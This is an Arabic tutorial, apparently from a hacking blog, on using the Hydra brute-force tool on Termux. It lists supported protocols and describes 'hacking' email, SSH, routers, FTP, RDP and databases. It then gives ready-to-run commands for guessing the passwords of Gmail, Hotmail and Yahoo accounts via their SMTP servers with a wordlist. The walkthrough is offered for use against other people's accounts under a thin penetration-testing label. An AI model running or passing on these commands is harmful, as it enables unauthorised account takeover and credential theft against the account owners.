Hydra هي أداة تخمين تستخدم لاختبار اختراق عن طريق الهجوم على العديد من البروتوكولات . هي اداة سريعة ومرنة للغاية ، والموديلات الجديدة سهلة الإضافة. تتيح هذه الأداة للباحثين وخبراء الأمن إظهار مدى امكانية اختراق كلمات السر الخاصة بالانظمة عن بعد.
تدعم البروتوكلات الاتية:
سرفر gmail:
تدعم البروتوكلات الاتية:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP
امكانيات الأداة هيدرا Hydra
- يمكن اختراق حسابات البريد الالكتروني مثل جيميل وياهو ..
- اختراق السيرفرات والدخول عبر النفق المشفر SSH البورت 22
- اختراق اجهزة الراوتر والحصول على بيانات صفحة تسجيل الدخول HTTP
- اختراق بروتوكول نقل الملفات FTP البورت 21
- اختراق سطح المكتب البعيد RDP البورت 3389
- اختراق التالنت Telnet عبر البورت 23
- اختراق قواعد البيانات الخاصة بالمواقع عن بعد Mysql عبر البورت 3306
- وغيرها الكثير ..
تعتمد الاداة في اختراق العديد من الحسابات عن طريق هجوم التخمين Brute-force >> Attack ..اي تخمن الباسوردات حتى تحصل على الباسورد الصحيح
لاختراق حساب جيميل (gmail) كمثال تابع معي:
يجب تثبيت أداة Hydra على تارموكس
1. للتثبيت انسخ الامر الأتي على تارموكس:
pkg install hydra
2. لتشغيل الاداة نكتب الامر hydra
hydra
الان كل ما تحتاجه هو قائمة باسووردات أو كلمات المرور التي تحتوي على كلمات المرور المحتملة
تجدها هنا:
وهذه اداة لصنع Wordlist تخمين:
لبدء الاختراق انسخ الامر التالي
الامر:-
hydra smtp.gmail.com smtp -l test@gmail.com -P /home/wordlist.txt -S 465 -v -V
- غير /home/wordlist.txt بمسار الوورد ليست أو قائمة كلمات المرور.
- وضع ايميلك بدل test@gmail.com
وبعدها ستنتظر قليلا لتتم عملية التخمين وستظهر لك كلمة password باللون الأخضر وستظهر كلمة السر الخاصة بالحساب.
اذا اردت اختبار اختراق حسابات البريد الالكتروني الاخرى غير الهوست والبورت
(Gmail)
server: smtp.gmail.com
port: 465
(hotmail)
server: smtp.live.com
port: 587
(yahoo)
server: smtp.mail.yahoo.com
port: 587
الاوامر:سرفر gmail:
hydra smtp.gmail.com smtp -l email@gmail.com -P /home/wordlist.txt -S 465 -v -Vسرفر hotmail:
hydra smtp.live.com smtp -l email@hotmail.com -P /home/wordlist.txt -S 587 -v -Vسرفر yahoo:
hydra smtp.mail.yahoo.com smtp -l email@yahoo.com -P /home/wordlist.txt -S 587 -v -Vقد يهمك أيضا: